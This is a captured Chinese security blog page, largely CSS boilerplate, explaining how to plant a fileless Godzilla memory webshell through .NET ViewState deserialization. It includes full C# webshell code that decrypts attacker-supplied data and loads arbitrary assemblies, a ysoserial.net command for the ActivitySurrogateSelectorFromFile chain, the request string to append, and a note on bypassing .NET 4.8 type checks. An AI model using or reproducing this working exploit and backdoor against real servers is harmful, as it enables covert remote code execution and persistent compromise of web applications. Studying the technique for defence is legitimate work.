<!DOCTYPE html> <html lang=zh-CN style><!--
Page saved with SingleFile
url: https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html
--><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1"><link rel=profile href=https://gmpg.org/xfn/11><title>.Net ViewState反序列化实现无文件哥斯拉内存马 Whwlsfb's Tech Blog</title><meta name=robots content=max-image-preview:large><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » Feed" href=https://blog.wanghw.cn/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » 评论 Feed" href=https://blog.wanghw.cn/comments/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » .Net ViewState反序列化实现无文件哥斯拉内存马 评论 Feed" href=https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html/feed><style>:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}@media(min-width:782px){}@media(max-width:781px){}@media(min-width:782px){}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:0}@supports(position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}@supports(-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media(prefers-reduced-motion:reduce){}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:where(.wp-block-file){margin-bottom:1.5em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 
1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}@media(min-width:600px){}@media(min-width:600px){}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image .aligncenter{display:table}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}@supports((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}@media(prefers-reduced-motion:no-preference){}@keyframes 
turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes 
sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes 
swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head runat="server"&gt;
&lt;title&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form id="form1" runat="server"&gt;
&lt;div&gt;
&lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
&lt;/div&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;%@ Page Language="C#" AutoEventWireup="true" CodeFile="success.aspx.cs" Inherits="member_success" %&gt;
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head runat="server"&gt;
&lt;title&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form id="form1" runat="server"&gt;
&lt;div&gt;
&lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
&lt;/div&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre><p id=ufb441563>这个页面非常简单,可以作为完美的特征案例,其中的关键点则是<code>&lt;form id="form1" runat="server"&gt;</code>,其中的<code>runat="server"</code>是必不可少的。这个属性标识了这个form将会支持ASP.net MVC的高级组件,将由服务端来处理、保存状态并且进行额外的解析操作。<p id=u8021fab0>下一步则需要提取页面中的<code>VIEWSTATEGENERATOR</code>,通常直接访问该页面即可获得。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-xml enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k9>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>html</span><span class=enlighter-text> </span><span class=enlighter-x2>xmlns</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"http://www.w3.org/1999/xhtml"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>body</span><span class=enlighter-g1>&gt;</span><span
class=enlighter-text></span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>form</span><span class=enlighter-text> </span><span class=enlighter-x2>method</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"post"</span><span class=enlighter-text> </span><span class=enlighter-x2>action</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"./success.aspx"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"form1"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>div</span><span class=enlighter-text> </span><span class=enlighter-x2>class</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"aspNetHidden"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>input</span><span class=enlighter-text> </span><span class=enlighter-x2>type</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"hidden"</span><span class=enlighter-text> </span><span class=enlighter-x2>name</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>value</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></s
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;&lt;title&gt;
&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;form method="post" action="./success.aspx" id="form1"&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
&lt;/div&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
&lt;/div&gt;
&lt;div&gt;
验证失败!用户:【】不存在
&lt;/div&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;&lt;title&gt;
&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;form method="post" action="./success.aspx" id="form1"&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
&lt;/div&gt;
&lt;div class="aspNetHidden"&gt;
&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
&lt;/div&gt;
&lt;div&gt;
验证失败!用户:【】不存在
&lt;/div&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre><p id=u022d2601>可见该页面的<code>VIEWSTATEGENERATOR</code>为<code>60AF4XXX</code>,下一步进行Payload生成。<h2 class=wp-block-heading id=c0b82f49>Payload构造</h2><p id=u3acd28be><a href=#devco-blog>devco的文章</a>中提到的构造方式为:构造一个简单的命令执行回显马,然后使用yso.net的ActivitySurrogateSelectorFromFile链生成payload。但是既然能执行任意代码了,构造一个内存马也是同样可以的。<blockquote class=wp-block-quote><p>从.NET 4.8 版本开始,默认开启了类型检查,如出现类型转换错误,则需要使用 ActivitySurrogateDisableTypeCheck 链进行 Patch 绕过,绕过后才能正常使用下文中提到的Payload。</p></blockquote><p>通过编写哥斯拉的专用代码,生成序列化数据,携带在请求包之中,便可实现无实体文件、无内存痕迹的哥斯拉内存马。<p id=ua78d4db8>哥斯拉内存马的payload代码如下:<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-csharp enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k0>class</span><span class=enlighter-text> d</span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-k0>public</span><span class=enlighter-text> </span><span class=enlighter-m0>d</span><span class=enlighter-g1>()</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text> System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text> Context = System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text>.</span><span class=enlighter-m3>Current</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text> Context.</span><span class=enlighter-m3>Server</span><span class=enlighter-text>.</span><span
class=enlighter-m3>ClearError</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text> Context.</span><span class=enlighter-m3>Response</span><span class=enlighter-text>.</span><span class=enlighter-m3>Clear</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-k1>try</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-k5>string</span><span class=enlighter-text> key = </span><span class=enlighter-s0>"3c6e0b8a9c15224a"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-k5>string</span><span class=enlighter-text> pass = </span><span class=enlighter-s0>"pas"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text> </span><span class=enlighter-k5>string</span><span class=enlighter-text> md5 = System.</span><span class=enlighter-m3>BitConverter</span><span class=enlighter-text>.</span><span class=enlighter-m3>ToString</span><span class=enlighter-g1>(</span><span class=enlighter-k3>new</span><span class=enlighter-text> System.</span><span class=enlighter-m3>Security</span><span class=enlighter-text>.</span><span class=enlighter-m3>Cryptography</span><span class=enlighter-text>.</span><span class=enlighter-m3>MD5CryptoServiceProvider</span><span class=enlighter-g1
{
public d()
{
System.Web.HttpContext Context = System.Web.HttpContext.Current;
Context.Server.ClearError();
Context.Response.Clear();
try
{
string key = "3c6e0b8a9c15224a";
string pass = "pas";
string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
if (Context.Session["payload"] == null)
{
Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
}
else
{
System.IO.MemoryStream outStream = new System.IO.MemoryStream();
object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
byte[] r = outStream.ToArray();
Context.Response.Write(md5.Substring(0, 16));
Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
}
}
catch (System.Exception) { }
Context.Response.Flush();
Context.Response.End();
}
}</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=csharp data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>class d
{
public d()
{
System.Web.HttpContext Context = System.Web.HttpContext.Current;
Context.Server.ClearError();
Context.Response.Clear();
try
{
string key = "3c6e0b8a9c15224a";
string pass = "pas";
string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
if (Context.Session["payload"] == null)
{
Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
}
else
{
System.IO.MemoryStream outStream = new System.IO.MemoryStream();
object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
byte[] r = outStream.ToArray();
Context.Response.Write(md5.Substring(0, 16));
Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
}
}
catch (System.Exception) { }
Context.Response.Flush();
Context.Response.End();
}
}</pre><p>保存该文件至本地,然后使用如下命令生成payload。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-shell enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg=</span><span class=enlighter-s0>"3DES"</span><span class=enlighter-text> -c=</span><span class=enlighter-s0>"123"</span><span class=enlighter-text> --decryptionkey=</span><span class=enlighter-s0>"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"</span><span class=enlighter-text> --validationalg=</span><span class=enlighter-s0>"SHA1"</span><span class=enlighter-text> --validationkey=</span><span class=enlighter-s0>"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"</span><span class=enlighter-text> --generator=60AF4XXX -c </span><span class=enlighter-s0>"CHANGEME.cs;System.Web.dll;System.dll"</span></div></div></div><div class="enlighter-raw sf-hidden">ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=shell data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</pre><p>通过使用输出的payload进行拼接,<strong>注意最后的&amp;不能漏掉</strong>。<div class="enlighter-default
enlighter-v-standard enlighter-t-atomic enlighter-l-raw enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</span></div></div></div><div class="enlighter-raw sf-hidden">__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=raw data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</pre><p>填写至哥斯拉的请求配置中的“左边追加数据”中。<div class=wp-block-image><figure class="aligncenter size-full"><img fetchpriority=high decoding=async width=734 height=780 src=
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:
576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(